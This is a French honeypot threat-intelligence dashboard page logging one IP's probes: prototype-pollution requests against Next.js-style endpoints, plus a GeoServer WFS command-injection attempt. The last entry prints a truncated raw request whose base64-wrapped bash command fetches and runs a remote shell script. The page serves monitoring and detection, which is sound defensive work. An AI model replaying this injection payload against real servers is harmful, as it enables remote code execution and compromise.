Profil de menace
Activité suspecte — risque 69/100 (Élevé) — MITRE TA0001 — confiance 50 % — via HTTP
Activité suspecte — risque 69/100 (Élevé) — MITRE TA0001 — confiance 50 % — via HTTP
Synthèse décisionnelle honeypot — seuil de listing maintenu à 1 événement qualifié.
Règle WAF « proto-0 » · confiance 50%
Confiance 50 % — Score WAF 100 · 7 tag(s) WAF
ASN 219502 · 94.154.43.0/24 · RIPENCC — 8 pair(s) ASN/FAI listé(s) — activité locale élevée vs pairs · 62 événements sur la période pour cette IP.
Même FAI Storm Industries LLC — corrélation indicative.
Cette IP touche plusieurs services simulés (pas seulement le web).
Origine réseau déclarée
Opérateur et dernière activité ban
Score capteur — surveiller, investiguer ou bloquer.
Les dates De/À priment sur la période. Affinez protocole, port, service et classification.
62 événements filtrés — activité quotidienne
Top ports ciblés sur les dernières 24 heures
SSH 22, RDP 3389, HTTP alternatifs…
Web, SSH, SAP, scans…
Intensité par jour et heure (UTC capteur)
62 événement(s) — page 2/2
| Horodatage | Proto | Port | Service | Classification | Sévérité | Risque | Actions |
|---|---|---|---|---|---|---|---|
| TCP | 3000 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3000 · (tentative d'exploit) · → /app | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /app UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
44
Recommandation
Investiguer
Tags
Cible HTTP
POST
/app
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/app
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 69
Confiance : Confiance 50 % — 7 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
Payload (extrait)
POST /app HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefo
Requête brute (extrait)
POST /app HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df9e0857 |
|||||||
| TCP | 3000 · HTTP | http | Énumération API REST rest api enum · via HTTP:3000 · (sonde / probe) · → /api/route | Élevée | Élevé · 66 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0007
TA0007
TA0001
Protocole
POST /api/route UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
54
Recommandation
Investiguer
Tags
Cible HTTP
POST
/api/route
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/api/route
Service
HTTP
Pourquoi cette classification : Énumération API REST (tag sqli-4) · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 66
Confiance : Confiance 50 % — 9 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Api Probe Generic
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
k8s-api
Payload (extrait)
POST /api/route HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101
Requête brute (extrait)
POST /api/route HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df |
|||||||
| TCP | 3000 · HTTP | http | Énumération API REST rest api enum · via HTTP:3000 · (sonde / probe) · → /api/route | Élevée | Élevé · 66 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0007
TA0007
TA0001
Protocole
POST /api/route UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
54
Recommandation
Investiguer
Tags
Cible HTTP
POST
/api/route
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/api/route
Service
HTTP
Pourquoi cette classification : Énumération API REST (tag sqli-4) · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 66
Confiance : Confiance 50 % — 9 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Api Probe Generic
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
k8s-api
Payload (extrait)
POST /api/route HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101
Requête brute (extrait)
POST /api/route HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df |
|||||||
| TCP | 3002 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3002 · (tentative d'exploit) · → /app | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /app UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
44
Recommandation
Investiguer
Tags
Cible HTTP
POST
/app
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3002
Chemin / cible
/app
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 69
Confiance : Confiance 50 % — 7 tag(s) WAF
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
Payload (extrait)
POST /app HTTP/1.1 Host: 62.3.50.33:3002 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefo
Requête brute (extrait)
POST /app HTTP/1.1 Host: 62.3.50.33:3002 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df9e0857 |
|||||||
| TCP | 3002 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3002 · (tentative d'exploit) · → /api | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /api UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
48
Recommandation
Investiguer
Tags
Cible HTTP
POST
/api
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3002
Chemin / cible
/api
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 69
Confiance : Confiance 50 % — 8 tag(s) WAF
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
k8s-api
Payload (extrait)
POST /api HTTP/1.1 Host: 62.3.50.33:3002 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefo
Requête brute (extrait)
POST /api HTTP/1.1 Host: 62.3.50.33:3002 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df9e0857 |
|||||||
| TCP | 3002 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3002 · (tentative d'exploit) | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST / UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
47
Recommandation
Investiguer
Tags
Cible HTTP
POST
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3002
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 69
Confiance : Confiance 50 % — 8 tag(s) WAF
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
sap-sapcontrol-path
Payload (extrait)
POST / HTTP/1.1 Host: 62.3.50.33:3002 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/1
Requête brute (extrait)
POST / HTTP/1.1 Host: 62.3.50.33:3002 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df9e0857376 |
|||||||
| TCP | 3001 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3001 · (tentative d'exploit) | Élevée | Élevé · 70 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST / UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
47
Recommandation
Investiguer
Tags
Cible HTTP
POST
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3001
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 70
Confiance : Confiance 50 % — 8 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
sap-sapcontrol-path
Payload (extrait)
POST / HTTP/1.1 Host: 62.3.50.33:3001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/1
Requête brute (extrait)
POST / HTTP/1.1 Host: 62.3.50.33:3001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df9e0857376 |
|||||||
| TCP | 3001 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3001 · (tentative d'exploit) · → /app | Élevée | Élevé · 70 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /app UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
44
Recommandation
Investiguer
Tags
Cible HTTP
POST
/app
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3001
Chemin / cible
/app
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 70
Confiance : Confiance 50 % — 7 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
Payload (extrait)
POST /app HTTP/1.1 Host: 62.3.50.33:3001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefo
Requête brute (extrait)
POST /app HTTP/1.1 Host: 62.3.50.33:3001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df9e0857 |
|||||||
| TCP | 3000 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3000 · (tentative d'exploit) · → /_next | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /_next UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
44
Recommandation
Investiguer
Tags
Cible HTTP
POST
/_next
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/_next
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 69
Confiance : Confiance 50 % — 7 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
Payload (extrait)
POST /_next HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Fire
Requête brute (extrait)
POST /_next HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df9e08 |
|||||||
| TCP | 3000 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3000 · (tentative d'exploit) · → /_next/server | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /_next/server UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
50
Recommandation
Investiguer
Tags
Cible HTTP
POST
/_next/server
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/_next/server
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 69
Confiance : Confiance 50 % — 8 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
Payload (extrait)
POST /_next/server HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/201001
Requête brute (extrait)
POST /_next/server HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf5 |
|||||||
| TCP | 3000 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3000 · (tentative d'exploit) · → /app | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /app UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
44
Recommandation
Investiguer
Tags
Cible HTTP
POST
/app
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/app
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 69
Confiance : Confiance 50 % — 7 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
Payload (extrait)
POST /app HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefo
Requête brute (extrait)
POST /app HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df9e0857 |
|||||||
| TCP | 8080 · HTTP | http | Injection de commande cmd injection · via HTTP:8080 · (tentative d'exploit) · → /geoserver/wfs | Élevée | Élevé · 66 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
GET /geoserver/wfs UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
42
Recommandation
Investiguer
Tags
Cible HTTP
GET
/geoserver/wfs
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8080
Chemin / cible
/geoserver/wfs
Service
HTTP
Pourquoi cette classification : Injection de commande (tag rce-0) · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 66
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
pat-0782
pat-0144
pat-0145
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 932190 php system
CRS 932190
CRS 932200
CRS 932205
CRS 932206
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
rce-0
rce-3
nosqli-3
php-rce-passthru
Payload (extrait)
GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runti
Requête brute (extrait)
GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),%27bash%20-c%20%7Becho%2CKHdnZXQgLXFPLSBodHRwOi8vNDUuMTUzLjM0LjE1My9yb25kby5gYHp5dC5zaHx8YnVzeWJveCB3Z2V0IC1xTy0 |
|||||||